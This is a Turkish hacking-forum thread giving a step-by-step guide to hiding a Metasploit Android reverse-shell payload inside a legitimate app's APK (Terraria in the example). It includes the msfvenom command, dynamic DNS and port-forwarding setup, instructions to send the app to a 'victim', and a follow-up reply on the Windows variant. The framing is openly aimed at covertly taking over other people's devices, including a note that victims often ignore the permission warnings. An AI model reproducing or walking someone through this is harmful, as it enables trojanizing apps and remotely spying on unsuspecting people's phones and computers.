İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Msfvenom ile apk'lara backdoor gömmek

30-01-2017 01:09
#1
Hichigo - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Nereden:
~/
Mesajlar:
929
Teşekkür (Etti):
439
Teşekkür (Aldı):
366
Konular:
122
Merhaba arkadaşlar bu gün sizlere msfvenom ve msfconsole kullanarak
nasıl bir apk'ya payload gömüp onu bir backdoora çevireceğimizi göstereceğim


KONUYU BEĞENİRSENİZ TEŞEKKÜR ETMEYİ UNUTMAYIN

ADIM-1

Öncelikle duckdns.org 'a girip IP'miz (static değilse) bir domain oluşturuyoruz bu IP'mizin değişmesine ve unutmamıza karşı bize önlem olacakdır.(Zaten çok kolay bir arayüzü var başka bir dynamic dns servisi'de kullanabilirsiniz)



ADIM-2

Modemimizde kafamıza göre bir portu yönlendiriyoruz ben 4444 portunu seçtim.(Her modeme göre port yönlendirme farklıdır.) (NAT sekmesinin altında olur genellikle.)



ADIM-3

İstediğiniz bir uygulamanın apk'sını indirin.Ben Terraria'nınkini indirdim.


ADIM-4

Terminali açın ve şu komutları kendinize göre olanlarını yazın.

Kod:
msfvenom -x apkadi.apk -p android/meterpreter/reverse_tcp LHOST=dinamikadresiniz LPORT=444 -k -o cikti.apk


PARAMETRE AÇIKLAMASI:

Kod:
-x : Backdooru açacağınız(payloadı yükleyeceğiniz) apk bu istediğiniz bir uygulama olabilir.
Kod:
-p  : Kullanacağımız payload demek oluyor burada  android/meterpreter/reverse_tcp isimli payloadı kullanıyoruz(Reverse TCP  sizin kurbana değil kurbanın size tcp protokolü ile {programı açınca  başlar} bağlanmasını sağlar).
Kod:
LHOST : Kurbanın bağlanacağı IP 
LPORT : Kurbanın bağlanacağı IP'nin bağlanacağı port
Kod:
-k  : orjinal apknın(izin seçtip indirdiğiniz uygulama) bozulmamasını  sağlıyor ve onun üzerine yazacağına yeni bir tane oluşturuyor
Kod:
-o : çıktının adını venereye olduğunu gösteriyor

ADIM-5

Kurbana apk'yı gönderdik şimdi onu kurup açmasını bekliyeceğiz bunun için msfconsol'u hazırlamalıyız.

Bunun için alttaki kodları msfconsol'a yazmalıyız.



SONRASINDA İSE METERPRETER SİZE GELMİŞ OLUYOR VE ORADAKİ BÜTÜN KOMUTLARI YAPTIRABİLİYORSUNUZ.(Komutlar için help yazabilirsiniz)

OLUŞTURDUĞUNUZ APK BAĞZI TELEFONLARDA KURARKEN FARK REHBERİ VE MİKROFONU VS KULLANACAĞINI FARK EDEBİLİYOR AMA KURBAN ALDIRIŞ ETMEZ VE KURARSA ÇALIŞIR.


AYNI YÖNTEMİ WİNDOWS İÇİN DE KULLANABİLİRSİNİZ.


ÇIKARDIĞIMIZ DOSYANIN VİRUSTOTAL'İ(EĞER BİR APK DOSYASINA BAĞLAMAZSANIZ DAHA ÇOK BULUNUR)



İŞİNİZE YARADIYSA NE MUTLU BANA! TEŞEKKÜR KOYMAYI UNUTMAYIN!(BAĞZI HATALARIM OLABİLİR ONLARIDA DAHA BİLGİLİ ARKADAŞLAR DÜZELTİRSE SEVİNİRİM SAĞLICAKLI KALIN)
Kullanıcı İmzası

30-01-2017 01:37
#2
Hichigo - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2015
Nereden:
~/
Mesajlar:
929
Teşekkür (Etti):
439
Teşekkür (Aldı):
366
Konular:
122
aynı uygulamayı windowsda yapmak için windows/meterpreter/reverse_tcp yazmalısınız
Kullanıcı İmzası

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı